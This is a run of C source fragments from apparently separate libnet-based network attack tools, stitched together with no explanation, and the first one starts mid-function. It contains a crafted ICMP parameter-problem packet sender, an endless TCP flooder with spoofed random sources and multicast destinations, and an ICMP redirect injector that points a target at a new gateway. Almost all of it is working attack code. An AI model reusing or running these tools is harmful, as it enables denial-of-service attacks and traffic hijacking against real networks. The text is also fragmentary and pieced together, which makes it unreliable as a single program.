= (struct icmp *) (packet + IP_H); problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */ icmp->icmp_type = ICMP_PARAMPROB; icmp->icmp_code = 0; /* Indicates a problem pointer */ *problem = htonl(0x14000000); /* Problem is 20 bytes into it */ /* Need to embed an IP packet within the ICMP */ ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */ ip->ip_v = 0x4; /* IPV4 */ ip->ip_hl = 0xf; /* Some IP Options */ ip->ip_tos = 0xa3; /* Whatever */ ip->ip_len = htons(data_len); /* Length of packet */ ip->ip_id = 30241; /* Whatever */ ip->ip_off = 0; /* No frag's */ ip->ip_ttl = 32; /* Whatever */ ip->ip_p = 98; /* Random protocol */ ip->ip_sum = 0; /* Will calc later */ ip->ip_src.s_addr = ins_src_ip; ip->ip_dst.s_addr = ins_dst_ip; /* Move our data block into the packet */ bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len); /* I hate checksuming. Spent a day trying to get it to work in * perl... That sucked... Tequilla would have helped immensly. */ libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len); /* Bah... See above comment.... */ libnet_do_checksum(packet, IPPROTO_ICMP, len); printf("Sending %li packets", count); for (acx = 0; acx < count; acx++) { if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H)) perror("write_ip: "); else printf("."); } printf("\n\n"); return( 0 ); }
int main (int argc, char *argv[]) { int i, loop; /* no payload yet */ int size = LIBNET_PACKET; opt.seqn = opt.ackn = opt.flags = 0; opt.dport = opt.sport = opt.frag = 0; opt.ttl = 255; opt.winsize = 16384; opt.tos = 0x08; signal (SIGINT, (void (*)()) abort); srand (time (NULL) + getpid ()); srandom (time (NULL) + getpid ()); banner (); parse_args (argc, argv); if (!whocares) { if (!local) { if (!(opt.dst = libnet_name_resolve (dsthost, LIBNET_RESOLVE))) { libnet_error (LIBNET_ERR_FATAL, ":: invalid destination IP address: %s\n", dsthost); exit (1); } printf (":: destination host - %s\n", dsthost); } else printf (":: destination host - local\n"); } else printf (":: destination host - whocares\n"); printf (":: destination port(s)"); for (i = 1; i < ports + 1; i++) printf (" - %d", portarray[i]); printf ("\n"); if (libnet_init_packet (size, &packet) == NULL) { libnet_error (LIBNET_ERR_FATAL, ":: libnet_init_packet failed\n"); } if ((s = libnet_open_raw_sock (IPPROTO_RAW)) == -1) { libnet_error (LIBNET_ERR_FATAL, ":: cannot open socket.\n"); } printf (":: spanking...\n"); printf (":: press ^C to end...\n"); for (;;) { for (i = 1; i < ports + 1; i++) { if (whocares) change2 = random () & 01; if (ismult) { opt.src = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); if (local) opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5); else { if (change2) opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); else opt.dst = rand (); } } else { opt.src = rand (); if (local) opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5); else { if (change2) opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); else opt.dst = rand (); } } if (isrand) { loop = rand () % 5; for (i = 0; i <= loop; i++) opt.flags |= flag_array[rand () % 5]; opt.frag = frag_array[rand () % 3]; opt.ackn = random (); opt.sport = 1024 + rand () % 32000; opt.tos = tos_array[rand () % 3]; opt.ttl = rand () % 255; opt.winsize = rand () % 32000; if (change) ismult = random () & 01; } opt.ident = random (); opt.seqn = random (); if (!stream) opt.ackn = random (); if (portarray[i] == 0) opt.dport = rand () % 1024; else opt.dport = portarray[i]; libnet_build_ip (TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl, IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet); libnet_build_tcp (opt.sport, opt.dport, opt.seqn, opt.ackn, opt.flags, opt.winsize, 0, NULL, 0, packet + IP_H); if (libnet_do_checksum (packet, IPPROTO_TCP, TCP_H) == -1) { libnet_error (LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n"); } libnet_write_ip (s, packet, size); } } return 1; }
int main(int argc, char **argv) { int sockfd, c; u_char *buf; u_long src, dst, gateway; if (argc < 4) { fprintf(stderr, "usage: %s <old_router> <target> <new_gateway>\n", argv[0]); exit(EXIT_FAILURE); } if (!(src = libnet_name_resolve(argv[1], 1))) { perror("Error resolving source host"); exit(EXIT_FAILURE); } if (!(dst = libnet_name_resolve(argv[2], 1))) { perror("Error resolving destination host"); exit(EXIT_FAILURE); } if (!(gateway = libnet_name_resolve(argv[3], 1))) { perror("Error resolving gateway host"); exit(EXIT_FAILURE); } if (libnet_init_packet(IP_MAXPACKET, &buf) == -1) { perror("Couldn't allocate memory for header"); exit(EXIT_FAILURE); } if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) == -1) { perror("Couldn't open raw socket"); exit(EXIT_FAILURE); } libnet_build_ip(LIBNET_ICMP_REDIRECT_H + LIBNET_IP_H, IPTOS_LOWDELAY | IPTOS_THROUGHPUT, 242, 0, 48, IPPROTO_ICMP, src, dst, NULL, 0, buf); libnet_build_icmp_redirect( ICMP_REDIRECT, ICMP_UNREACH_HOST, gateway, 0, /* just an ip header */ IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */ 424, /* IP ID */ 0, /* Frag stuff */ 64, /* TTL */ IPPROTO_ICMP, /* Transport protocol */ dst, /* Source IP */ src, /* Destination IP */ NULL, /* pointer to payload */ 0, /* size of payload */ buf + LIBNET_IP_H); /* packet header memory */ libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_REDIRECT_H + LIBNET_IP_H); c = libnet_write_ip(sockfd, buf, LIBNET_ICMP_REDIRECT_H + 2 * LIBNET_IP_H); if (c != LIBNET_ICMP_REDIRECT_H + 2 * LIBNET_IP_H) { fprintf(stderr, "Error writing to socket, only wrote %d bytes\n", c); exit(EXIT_FAILURE); } printf("Completed, wrote %d bytes\n", c); libnet_destroy_packet(&buf); exit(EXIT_SUCCESS); }